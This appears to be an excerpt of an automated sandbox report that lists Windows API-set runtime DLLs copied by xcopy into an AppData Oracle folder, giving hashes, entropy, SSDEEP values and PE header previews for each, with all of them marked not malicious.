MD5:D0873E21721D04E20B6FFB038ACCF2F1
SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):20792
Entropy (8bit):7.089032314841867
Encrypted:false
SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.101895292899441
Encrypted:false
SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:D500D9E24F33933956DF0E26F087FD91
SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.16337963516533
Encrypted:false
SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:6F6796D1278670CCE6E2D85199623E27
SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19248
Entropy (8bit):7.073730829887072
Encrypted:false
SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:5F73A814936C8E7E4A2DFD68876143C8
SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19392
Entropy (8bit):7.082421046253008
Encrypted:false
SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:A2D7D7711F9C0E3E065B2929FF342666
SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.1156948849491055
Encrypted:false
SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:D0289835D97D103BAD0DD7B9637538A1
SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17712
Entropy (8bit):7.187691342157284
Encrypted:false
SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17720
Entropy (8bit):7.19694878324007
Encrypted:false
SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.137724132900032
Encrypted:false
SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:12CC7D8017023EF04EBDD28EF9558305
SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):20280
Entropy (8bit):7.04640581473745
Encrypted:false
SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:71AF7ED2A72267AAAD8564524903CFF6
SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.138910839042951
Encrypted:false
SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:false
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19248
                                                                                                                                                                                              Entropy (8bit):7.072555805949365
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                                                                                                                                              MD5:19A40AF040BD7ADD901AA967600259D9
                                                                                                                                                                                              SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                                                                                                                                              SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                                                                                                                                              SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18224
                                                                                                                                                                                              Entropy (8bit):7.17450177544266
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                                                                                                                                              MD5:BABF80608FD68A09656871EC8597296C
                                                                                                                                                                                              SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                                                                                                                                              SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                                                                                                                                              SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18232
                                                                                                                                                                                              Entropy (8bit):7.1007227686954275
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                                                                                                                                              MD5:0F079489ABD2B16751CEB7447512A70D
                                                                                                                                                                                              SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                                                                                                                                              SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                                                                                                                                              SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):19256
                                                                                                                                                                                              Entropy (8bit):7.088693688879585
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                                                                                                                                              MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                                                                                                                                              SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                                                                                                                                              SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                                                                                                                                              SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):22328
                                                                                                                                                                                              Entropy (8bit):6.929204936143068
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                                                                                                                                              MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                                                                                                                                              SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                                                                                                                                              SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                                                                                                                                              SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18736
                                                                                                                                                                                              Entropy (8bit):7.078409479204304
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                                                                                                                                              MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                                                                                                                                              SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                                                                                                                                              SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                                                                                                                                              SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):20280
                                                                                                                                                                                              Entropy (8bit):7.085387497246545
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                                                                                                                                              MD5:AEC2268601470050E62CB8066DD41A59
                                                                                                                                                                                              SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                                                                                                                                              SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                                                                                                                                              SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19256
Entropy (8bit):7.060393359865728
Encrypted:false
SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.13172731865352
Encrypted:false
SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):28984
Entropy (8bit):6.6686462438397
Encrypted:false
SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:8B0BA750E7B15300482CE6C961A932F0
SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):26424
Entropy (8bit):6.712286643697659
Encrypted:false
SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:35FC66BD813D0F126883E695664E7B83
SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):73016
Entropy (8bit):5.838702055399663
Encrypted:false
SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:47FA76778556F34A5E7910C816C78835109E4050
SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19256
Entropy (8bit):7.076072254895036
Encrypted:false
SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:8D02DD4C29BD490E672D271700511371
